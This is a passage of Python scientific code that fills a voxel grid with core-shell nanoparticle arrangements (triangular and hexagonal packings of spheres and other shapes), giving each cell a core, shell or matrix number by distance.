if (shape=='octahedron'):
index = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
Npixgg=Npixgg-1
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
# função ou classe que descreve qual geometria vai ser escolhida.
# primeiramente será feito com funções
# aqui é a geometria com base triangular
def triangularfcc2in2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,cs,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
ii=1
for o in range (1,int(Ntam/2+1)):
for h in range(1,2+1):
if (h==2):
#f=2*h
f=h+1
Npiyw=Npiy-(f-1)
w=Npiyw
Npixg=Npix-(f-1)
g=Npixg
box=0
Npixgg=Npixg
if(h==1):
Npiyw=Npiy-(h-1)
w=Npiyw
Npixg=Npix-(h-1)
g=Npixg
box=0
Npixgg=Npixg
while (w > 0):
box=box+1
g=Npixgg
while (g>0):
if(h==1):
x[ii]= (((2*(g-1)+(box)+(h-1))*radiusc/dl-i+2))
y[ii]= (((2*(2-1)+(w-1)*sqrt(3.0)+(h-1))*radiusc/dl-j)+2)
z[ii]= (((sqrt(3.0)*(h-1)+1+2*(o-1)*sqrt(3.0))*radiusc/dl-k+2))
if (h==2 ):
# print ('aqui')
x[ii]= (((2*(g-1)+(box)+(f-1))*radiusc/dl-i+2))
y[ii]= (((2*(2-1)+(w-1)*sqrt(3.0)+(f-1))*radiusc/dl-j)+2)
z[ii]= (((sqrt(3.0)*(h-1)+1+2*(o-1)*sqrt(3.0))*radiusc/dl-k+2))
if (shape=='sphere'):
[index,aa] = incoreshell_sphere(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='cubic'):
[index,aa] = incoreshell_cubic(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='octahedron'):
[index,aa] = incoreshell_octahedron(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='triplate'):
[index,aa] = incoreshell_triplate(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber, shellnumber,dl,h,x,y,z,base,width,height,base2,width2,cs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
if (shape=='ellipsoidal'):
[index,aa] = incoreshell_ellipsoid(Npiy,Npix,w,g,i,j,k,ii,a,b,cnum,radiusc,radiuscore, radiusshell, corenumber,shellnumber,dl,h,x,y,z,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs)
if (aa==1):
A[i][j+(k-1)*Dy1] = index
g=g-1
ii=ii+1
w=w-1
Npixgg=Npixgg-1
return A
###########################################################################################################################
def hex1 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
# print corenumber,shellnumber,cnum
a=int(i)
b=int(j+(k-1)*Dy1)
xx1 = float(((float(3.0*radiusc))/float(dl)-float(i)))
yy1 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz1 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx2 = float(((float(2.0*radiusc))/float(dl)-float(i)))
yy2 = float(((float((3.0-sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz2 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx3 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy3= float(((float((3.0-sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz3 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx4 = float(((float(2.0*radiusc))/float(dl)-float(i)))
yy4 = float(((float((3.0+sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz4 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx5 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy5 = float(((float((3.0+sqrt(3.0))*radiusc))/float(dl)-float(j)))
zz5 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx6 = float(((float(1.0*radiusc))/float(dl)-float(i)))
yy6 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz6 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
xx7 = float(((float(5.0*radiusc))/float(dl)-float(i)))
yy7 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz7 = float(((float(radiusc))/float(dl)-float(k+1)+float(1)))
## second layer
xx8 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy8 = float(((float(4.0*radiusc))/float(dl)-float(j)))
zz8 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
xx9 = float(((float(4.0*radiusc))/float(dl)-float(i)))
yy9 = float(((float(2.0*radiusc))/float(dl)-float(j)))
zz9 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
xx10 = float(((float((3.0-sqrt(3.0)/2)*radiusc))/float(dl)-float(i)))
yy10 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz10 = float(((float((1.0+sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
### third layer
xx11 = float(((float(3.0*radiusc))/float(dl)-float(i)))
yy11 = float(((float(3.0*radiusc))/float(dl)-float(j)))
zz11 = float(((float((1.0+2*sqrt(3.0))*radiusc))/float(dl)-float(k+1)+float(1)))
a=int(i)
b=int(j+(k-1)*Dy1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
#print A[a][b],a,b
return A
###########################################################################################################################
###########################################################################################################################
def hex2 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
## first layer
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float((float((3)*radiusc/dl)-float(i)+1))
yy1= float((float((3)*radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-float(k)+1))
xx2=float((float((3-1.0)*radiusc/dl)-float(i)+1))
yy2= float((float((3-sqrt(3.0)))*radiusc/dl-float(j)+1))
zz2=float((float(radiusc/dl)-float(k)+1))
xx3=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-j+1))
zz3=float((float(radiusc/dl)-float(k)+1))
xx4=float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4=float((float(radiusc/dl)-float(k)+1))
xx5=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5=float((float(radiusc/dl)-float(k)+1))
xx6=float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6=float((float(radiusc/dl)-float(k)+1))
xx7=float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7=float((float(radiusc/dl)-float(k)+1))
# second layer
xx8=float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8=float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx9=float(((3+1)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz9= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx10= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-1.0-sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz10= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx11=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+1.0+sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz11= float(((1.0+1.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# third layer
xx12= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy12= float(((3.0-sqrt(3.0)/2)*float(radiusc/dl)-float(j)+1))
zz12= float(((1.0+2*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx13= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy13= float(((3.0+sqrt(3.0)/2)*float(radiusc/dl)-float(j)+1))
zz13= float(((1.0+2.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# fourth layer
xx14=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy14= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz14=float(((1.0+3.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex3 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-float(k)+1))
xx2= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy2= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz2= float((float(radiusc/dl)-float(k)+1))
xx3=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz3= float((float(radiusc/dl)-float(k)+1))
xx4= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4= float((float(radiusc/dl)-float(k)+1))
xx5= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5= float((float(radiusc/dl)-float(k)+1))
xx6=float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6= float((float(radiusc/dl)-float(k)+1))
xx7=float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7= float((float(radiusc/dl)-float(k)+1))
# second layer
xx8= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx9= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz9= float(((1+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx10= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-1.0-sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz10= float(((1.0+sqrt(3.0))*float(radiusc/dl)-float(k)+1))
xx11= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+1.0+sqrt(2.0)/2)*float(radiusc/dl)-float(j)+1))
zz11= float(((1.0+1.0*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
# third layer
xx12= float(((3)*float(radiusc/dl)-float(i)+1))
yy12= float(((3)*float(radiusc/dl)-float(j)+1))
zz12= float(((1+2*sqrt(3.0))*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
